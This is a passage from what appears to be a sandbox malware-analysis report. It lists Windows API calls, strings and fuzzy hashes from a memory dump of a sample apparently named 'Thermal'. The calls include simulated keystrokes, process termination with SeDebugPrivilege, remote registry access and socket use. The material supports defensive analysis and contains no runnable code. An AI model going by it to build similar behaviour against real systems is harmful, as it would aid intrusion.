                                                  • Part of subcall function 007CB52D: AttachThreadInput.USER32(00000000,?,007CA23B,?,00000001), ref: 007CB55B
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA246
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007CA263
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007CA266
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA26F
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007CA28D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA290
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA299
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007CA2B0
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA2B3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                • Instruction ID: 4240c48d7e9a8684220fba218da0ea28fbe4ff9fb19b6d9404ad5076158ebfbf
                                                • Opcode Fuzzy Hash: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                • Instruction Fuzzy Hash: 0211E1B1A50218BEF7106F609C8AF6A3B2DEB8C765F100419F354AB0D1CAF35C609EA0
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C915A,00000B00,?,?), ref: 007C94E2
                                                • HeapAlloc.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C94E9
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C94FE
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,007C915A,00000B00,?,?), ref: 007C9506
                                                • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9509
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C9519
                                                • GetCurrentProcess.KERNEL32(007C915A,00000000,?,007C915A,00000B00,?,?), ref: 007C9521
                                                • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9524
                                                • CreateThread.KERNEL32(00000000,00000000,007C954A,00000000,00000000,00000000), ref: 007C953E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                • Instruction ID: 6ee8b91d3e990868b2ae2bcb146822e83068c72c3e5bad92259afa69b5b2ad0e
                                                • Opcode Fuzzy Hash: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                • Instruction Fuzzy Hash: 1901B6B5640308BFE791ABA5DC4DF6B7BACFB89711F108411FA05DB2A1CA749800CF20
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                • Instruction ID: 024f40e5f92c59aea5b7ff66138fb4f5ded33ee7105ebd5efa7a1f819e68f471
                                                • Opcode Fuzzy Hash: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                • Instruction Fuzzy Hash: 75C1A171A0125AAFDF10CF99C884BAEB7F5FF48314F148469E915AB280E778AD44CB51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                • Instruction ID: 2f3f7609f6ee94e030cfdbea5fbf49b8c92a2071f67ae7bcea653ddf42f617ce
                                                • Opcode Fuzzy Hash: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                • Instruction Fuzzy Hash: A191A372A01259ABCF24CF96C844F9EB7B8EF49714F10815DF615AB241D778A944CFA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F7449
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007F745D
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F7477
                                                • _wcscat.LIBCMT ref: 007F74D2
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 007F74E9
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F7517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                • Instruction ID: f271f8ef8bc1472975a0a9aa3c3ccdaa37cae53d00aaadab30bf4a98ff196149
                                                • Opcode Fuzzy Hash: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                • Instruction Fuzzy Hash: 0F41C370A0434CAFEB219F64CC85BFE77A9EF08350F10442AFA54E7291D6759D84DB60
                                                APIs
                                                  • Part of subcall function 007D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                  • Part of subcall function 007D4148: Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                  • Part of subcall function 007D4148: CloseHandle.KERNEL32(00000000), ref: 007D4245
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF08D
                                                • GetLastError.KERNEL32 ref: 007EF0A0
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF0CF
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 007EF14C
                                                • GetLastError.KERNEL32(00000000), ref: 007EF157
                                                • CloseHandle.KERNEL32(00000000), ref: 007EF18C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                • Instruction ID: 8c240dee3e668bda4c5af0c0f04af8e0d087ba133ea34205e3bf6200ebc0299e
                                                • Opcode Fuzzy Hash: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                • Instruction Fuzzy Hash: C0419A31301205DFDB25EF25CC99F6DB7A5AF88714F08841DF9469B292DB78A804CB96
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 007D357C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                • Instruction ID: 289ce6bf725a244139e50981e13f8cd2be2cd188a72439f952d83cefa4a6f80b
                                                • Opcode Fuzzy Hash: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                • Instruction Fuzzy Hash: 4D113D71649756FEEB004A34FC82D6A77BCEF05360B20001BF91196381E7AC7F5046A6
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4802
                                                • LoadStringW.USER32(00000000), ref: 007D4809
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D481F
                                                • LoadStringW.USER32(00000000), ref: 007D4826
                                                • _wprintf.LIBCMT ref: 007D484C
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D486A
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 007D4847
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                • Instruction ID: 8fc0ab0db6bb1e05cebd9b8b511c8e9658e10d7faa7dffa6fa9b888518631ab5
                                                • Opcode Fuzzy Hash: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                • Instruction Fuzzy Hash: 7D012CF69003487BE75197A09D89FE7766CEB08300F400596B759E2141EA749E844F75
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FDB42
                                                • GetSystemMetrics.USER32(0000000F), ref: 007FDB62
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FDD9D
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FDDBB
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FDDDC
                                                • ShowWindow.USER32(00000003,00000000), ref: 007FDDFB
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007FDE20
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 007FDE43
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                • String ID:
                                                • API String ID: 1211466189-0
                                                • Opcode ID: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                • Instruction ID: c27f601372e5b31d8248f159a96ebbc5abc9a36e19aa032a0681035f86cc2496
                                                • Opcode Fuzzy Hash: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                • Instruction Fuzzy Hash: E8B19C71600219EFDF24CF69C9897BD7BB2BF44701F088169EE489E255D739AD50CBA0
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F044E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BuffCharConnectRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3479070676-0
                                                • Opcode ID: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                • Instruction ID: dd34bf8c5b18e8f72184cb7fd3c359d1cb03db42a2b2253fc9322018acc15c81
                                                • Opcode Fuzzy Hash: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                • Instruction Fuzzy Hash: B0A14870204205DFCB20EF24C885B7EB7E5AF84314F14891DF6969B392DB39A955CF92
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 00772E9F
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00772EE7
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC55B
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC5C7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                • Instruction ID: c03f45f71f4f568d94fa82a84ff9c4dcc82bdb4abfe08221a52dcee99985cca6
                                                • Opcode Fuzzy Hash: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                • Instruction Fuzzy Hash: 8941DB30604780AEDF764728888CB7A7B92BBD3340F28C51DF4AB46562C7BDE852DB15
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7698
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D76CF
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D76EB
                                                • _memmove.LIBCMT ref: 007D7739
                                                • _memmove.LIBCMT ref: 007D7756
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D7765
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D777A
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7799
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 256516436-0
                                                • Opcode ID: bce698f711907b78dbd0b9ffd088c9e1776112860c0935b28163c80f40abe254
                                                • Instruction ID: dc4ac910213afd3ef0e40e983d2bc4808ca3411ccaa925420397286992de07bc
                                                • Opcode Fuzzy Hash: bce698f711907b78dbd0b9ffd088c9e1776112860c0935b28163c80f40abe254
                                                • Instruction Fuzzy Hash: 5E315E71904209EFCF50EF64DC89EAEB778FF45710F1480A6F904AA256EB349A54DBA0
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 007F6810
                                                • GetDC.USER32(00000000), ref: 007F6818
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6823
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007F682F
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F686B
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F687C
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 007F68B6
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F68D6
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                • Instruction ID: bdd9496d4d2feb8075cc181b8853fdb19a9fe17d2f6eb6d32272f9c85fd697b1
                                                • Opcode Fuzzy Hash: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                • Instruction Fuzzy Hash: 4A316B72101614BFEB118F14CC8AFEA3BAEFF49761F044065FE089A291D67A9851CBB0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memcmp
                                                • String ID:
                                                • API String ID: 2931989736-0
                                                • Opcode ID: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                • Instruction ID: 4fc1fdc9beda21869b0f43d2d57c285cb9ea978b3906c62ca27f1badaec21b8b
                                                • Opcode Fuzzy Hash: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                • Instruction Fuzzy Hash: 9121DA73A45106BAE606B5105D46FAB375CEE21754F08402CFD0AE6382EB1CDE21C6A1
                                                APIs
                                                  • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                  • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • _wcstok.LIBCMT ref: 007DF2D7
                                                • _wcscpy.LIBCMT ref: 007DF366
                                                • _memset.LIBCMT ref: 007DF399
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: 1a4caf28fbef0ab87f5152433f12106387406dc912d4d8fc2bcba20862f0062a
                                                • Instruction ID: efc896a5d4a852f1cf381eec0b5cedd94cc120a723a34d56e0c2ce8ff457dde6
                                                • Opcode Fuzzy Hash: 1a4caf28fbef0ab87f5152433f12106387406dc912d4d8fc2bcba20862f0062a
                                                • Instruction Fuzzy Hash: CCC17B71604341DFC714EF64D889A5AB7E4BF84350F40892EF89A973A2DB38EC45CB92
                                                APIs
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E72EB
                                                 • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E730C (WSOCK32.DLL ordinal 17 is recvfrom; it is listed by ordinal because the import has no name)
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E731F
                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 007E73D5
                                                • inet_ntoa.WSOCK32(?), ref: 007E7392
                                                  • Part of subcall function 007CB4EA: _strlen.LIBCMT ref: 007CB4F4
                                                  • Part of subcall function 007CB4EA: _memmove.LIBCMT ref: 007CB516
                                                • _strlen.LIBCMT ref: 007E742F
                                                • _memmove.LIBCMT ref: 007E7498
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                 • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmp
                                                 • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                • String ID:
                                                • API String ID: 3619996494-0
                                                • Opcode ID: 8d930f3f1e7ebc08627e312f83b6513c131ae58d58f5e37d719264d728baf731
